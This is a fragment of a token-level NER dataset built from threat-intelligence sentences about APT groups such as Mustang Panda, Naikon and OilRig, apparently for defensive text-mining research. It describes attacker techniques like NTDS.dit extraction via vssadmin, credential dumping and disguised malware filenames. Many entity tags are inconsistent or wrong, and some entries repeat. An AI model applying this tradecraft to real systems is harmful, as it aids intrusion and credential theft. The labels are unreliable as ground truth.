"tool", - "for", - "creating", - "reverse", - "shells." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "B-Tool" - ] - }, - { - "tokens": [ - "MuddyWater", - "has", - "used", - "malware", - "that", - "leveraged", - "WMI", - "for", - "execution", - "and", - "querying", - "host", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "encrypted", - "documents", - "with", - "RC4", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "RAR", - "to", - "create", - "password-protected", - "archives", - "of", - "collected", - "documents", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "used", - "custom", - "batch", - "scripts", - "to", - "collect", - "files", - "automatically", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "junk", - "code", - "within", - "their", - "DLL", - "files", - "to", - "hinder", - "analysis." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "a", - "legitimately", - "signed", - "executable", - "to", - "execute", - "a", - "malicious", - "payload", - "within", - "a", - "DLL", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "have", - "acquired", - "C2", - "domains", - "prior", - "to", - "operations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "an", - "additional", - "filename", - "extension", - "to", - "hide", - "the", - "true", - "file", - "type." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "leveraged", - "the", - "legitimate", - "email", - "marketing", - "service", - "SMTP2Go", - "for", - "phishing", - "campaigns." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "a", - "customized", - "PlugX", - "variant", - "which", - "could", - "exfiltrate", - "documents", - "from", - "air-gapped", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "exploited", - "CVE-2017-0199", - "in", - "Microsoft", - "Word", - "to", - "execute", - "code." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Features", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "will", - "delete", - "their", - "tools", - "and", - "files,", - "and", - "kill", - "processes", - "after", - "their", - "objectives", - "are", - "reached." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "searched", - "the", - "entire", - "target", - "system", - "for", - "DOC,", - "DOCX,", - "PPT,", - "PPTX,", - "XLS,", - "XLSX,", - "and", - "PDF", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda's", - "PlugX", - "variant", - "has", - "created", - "a", - "hidden", - "folder", - "on", - "USB", - "drives", - "named", - "<code>RECYCLE.BIN</code>", - "to", - "store", - "malicious", - "executables", - "and", - "collected", - "data." - ], - "ner_tags": [ - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "downloaded", - "additional", - "executables", - "following", - "the", - "initial", - "infection", - "stage." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "<code>InstallUtil.exe</code>", - "to", - "execute", - "a", - "malicious", - "Beacon", - "stager." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "stored", - "collected", - "credential", - "files", - "in", - "<code>c:\\windows\\temp</code>", - "prior", - "to", - "exfiltration.", - "Mustang", - "Panda", - "has", - "also", - "stored", - "documents", - "for", - "exfiltration", - "in", - "a", - "hidden", - "folder", - "on", - "USB", - "drives." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "sent", - "malicious", - "files", - "requiring", - "direct", - "victim", - "interaction", - "to", - "execute." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "sent", - "malicious", - "links", - "including", - "links", - "directing", - "victims", - "to", - "a", - "Google", - "Drive", - "folder." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "names", - "like", - "`adobeupdate.dat`", - "and", - "`PotPlayerDB.dat`", - "to", - "disguise", - "PlugX,", - "and", - "a", - "file", - "named", - "`OneDrive.exe`", - "to", - "load", - "a", - "Cobalt", - "Strike", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "mshta.exe", - "to", - "launch", - "collection", - "scripts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "vssadmin", - "to", - "create", - "a", - "volume", - "shadow", - "copy", - "and", - "retrieve", - "the", - "NTDS.dit", - "file.", - "Mustang", - "Panda", - "has", - "also", - "used", - "<code>reg", - "save</code>", - "on", - "the", - "SYSTEM", - "file", - "Registry", - "location", - "to", - "help", - "extract", - "the", - "NTDS.dit", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "delivered", - "initial", - "payloads", - "hidden", - "using", - "archives", - "and", - "encoding", - "measures." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "malicious", - "PowerShell", - "scripts", - "to", - "enable", - "execution." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "<code>tasklist", - "/v</code>", - "to", - "determine", - "active", - "process", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "created", - "the", - "registry", - "key", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\AdobelmdyU</code>", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "installed", - "TeamViewer", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "a", - "customized", - "PlugX", - "variant", - "which", - "could", - "spread", - "through", - "USB", - "connections." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "created", - "a", - "scheduled", - "task", - "to", - "execute", - "additional", - "malicious", - "software,", - "as", - "well", - "as", - "maintain", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "searched", - "the", - "victim", - "system", - "for", - "the", - "<code>InstallUtil.exe</code>", - "program", - "and", - "its", - "version." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "spearphishing", - "attachments", - "to", - "deliver", - "initial", - "access", - "payloads." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "delivered", - "malicious", - "links", - "to", - "their", - "intended", - "targets." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "delivered", - "web", - "bugs", - "to", - "profile", - "their", - "intended", - "targets." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "servers", - "under", - "their", - "control", - "to", - "validate", - "tracking", - "pixels", - "sent", - "to", - "phishing", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "encrypted", - "C2", - "communications", - "with", - "RC4." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "gathered", - "system", - "information", - "using", - "<code>systeminfo</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "<code>ipconfig</code>", - "and", - "<code>arp</code>", - "to", - "determine", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "<code>netstat", - "-ano</code>", - "to", - "determine", - "network", - "connection", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "hosted", - "malicious", - "payloads", - "on", - "DropBox", - "including", - "PlugX." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "embedded", - "VBScript", - "components", - "in", - "LNK", - "files", - "to", - "download", - "additional", - "files", - "and", - "automate", - "collection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "communicated", - "with", - "its", - "C2", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "used", - "DropBox", - "URLs", - "to", - "deliver", - "variants", - "of", - "PlugX." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "executed", - "HTA", - "files", - "via", - "cmd.exe,", - "and", - "used", - "batch", - "scripts", - "for", - "collection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustang", - "Panda", - "has", - "executed", - "PowerShell", - "scripts", - "via", - "WMI." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mustang", - "Panda's", - "custom", - "ORat", - "tool", - "uses", - "a", - "WMI", - "event", - "consumer", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "operates", - "a", - "global", - "network", - "of", - "compromised", - "websites", - "that", - "redirect", - "into", - "a", - "traffic", - "distribution", - "system", - "(TDS)", - "to", - "select", - "victims", - "for", - "a", - "fake", - "browser", - "update", - "page." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "used", - "drive-by", - "downloads", - "for", - "initial", - "infection,", - "often", - "using", - "fake", - "browser", - "updates", - "as", - "a", - "lure." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "injected", - "malicious", - "JavaScript", - "into", - "compromised", - "websites", - "to", - "infect", - "victims", - "via", - "drive-by", - "download." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "deployed", - "secondary", - "payloads", - "and", - "third", - "stage", - "implants", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "lured", - "users", - "into", - "downloading", - "malware", - "through", - "malicious", - "links", - "in", - "fake", - "advertisements", - "and", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "posted", - "false", - "advertisements", - "including", - "for", - "software", - "packages", - "and", - "browser", - "updates", - "in", - "order", - "to", - "distribute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "used", - "the", - "filename", - "`AutoUpdater.js`", - "to", - "mimic", - "legitimate", - "update", - "files", - "and", - "has", - "also", - "used", - "the", - "Cyrillic", - "homoglyph", - "characters", - "С", - "`(0xd0a1)`", - "and", - "а", - "`(0xd0b0)`,", - "to", - "produce", - "the", - "filename", - "`Сhrome.Updаte.zip`." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "poisoned", - "search", - "engine", - "results", - "to", - "return", - "fake", - "software", - "updates", - "in", - "order", - "to", - "distribute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "acquired", - "servers", - "to", - "host", - "second-stage", - "payloads", - "that", - "remain", - "active", - "for", - "a", - "period", - "of", - "either", - "days,", - "weeks,", - "or", - "months." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "sent", - "victims", - "emails", - "containing", - "links", - "to", - "compromised", - "websites." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "used", - "implants", - "to", - "perform", - "system", - "reconnaissance", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mustard", - "Tempest", - "has", - "hosted", - "payloads", - "on", - "acquired", - "second-stage", - "servers", - "for", - "periods", - "of", - "either", - "days,", - "weeks,", - "or", - "months." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "the", - "RoyalRoad", - "exploit", - "builder", - "to", - "drop", - "a", - "second", - "stage", - "loader,", - "intel.wll,", - "into", - "the", - "Word", - "Startup", - "folder", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "DLL", - "side-loading", - "to", - "load", - "malicious", - "DLL's", - "into", - "legitimate", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "administrator", - "credentials", - "for", - "lateral", - "movement", - "in", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "convinced", - "victims", - "to", - "open", - "malicious", - "attachments", - "to", - "execute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "renamed", - "a", - "malicious", - "service", - "<code>taskmgr</code>", - "to", - "appear", - "to", - "be", - "a", - "legitimate", - "version", - "of", - "Task", - "Manager." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "disguised", - "malicious", - "programs", - "as", - "Google", - "Chrome,", - "Adobe,", - "and", - "VMware", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "the", - "LadonGo", - "scanner", - "to", - "scan", - "target", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "modified", - "a", - "victim's", - "Windows", - "Run", - "registry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "a", - "netbios", - "scanner", - "for", - "remote", - "machine", - "identification." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "schtasks.exe", - "for", - "lateral", - "movement", - "in", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "uses", - "commands", - "such", - "as", - "<code>netsh", - "advfirewall", - "firewall</code>", - "to", - "discover", - "local", - "firewall", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "malicious", - "e-mail", - "attachments", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "uses", - "commands", - "such", - "as", - "<code>netsh", - "interface", - "show</code>", - "to", - "discover", - "network", - "interface", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Naikon", - "has", - "used", - "WMIC.exe", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "executed", - "PowerShell", - "in", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "has", - "used", - "malicious", - "macros", - "to", - "download", - "additional", - "files", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "as", - "attempted", - "to", - "lure", - "victims", - "into", - "clicking", - "on", - "malicious", - "attachments", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "attempted", - "to", - "make", - "Octopus", - "appear", - "as", - "a", - "Telegram", - "Messenger", - "with", - "a", - "Russian", - "interface." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "has", - "targeted", - "victims", - "with", - "spearphishing", - "emails", - "containing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nomadic", - "Octopus", - "used", - "<code>cmd.exe", - "/c</code>", - "within", - "a", - "malicious", - "macro." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "used", - "the", - "Plink", - "utility", - "and", - "other", - "tools", - "to", - "create", - "tunnels", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "automated", - "collection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "brute", - "force", - "techniques", - "to", - "obtain", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "LaZagne", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "various", - "types", - "of", - "scripting", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "a", - "CHM", - "payload", - "to", - "load", - "and", - "execute", - "another", - "malicious", - "file", - "once", - "delivered", - "to", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "LaZagne", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OilRig", - "has", - "used", - "credential", - "dumping", - "tools", - "such", - "as", - "LaZagne", - "to", - "steal", - "credentials", - "to", - "accounts", - "logged", - "into", - "the", - "compromised", - "system", - "and", - "to", - "Outlook", - "Web", - "Access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - 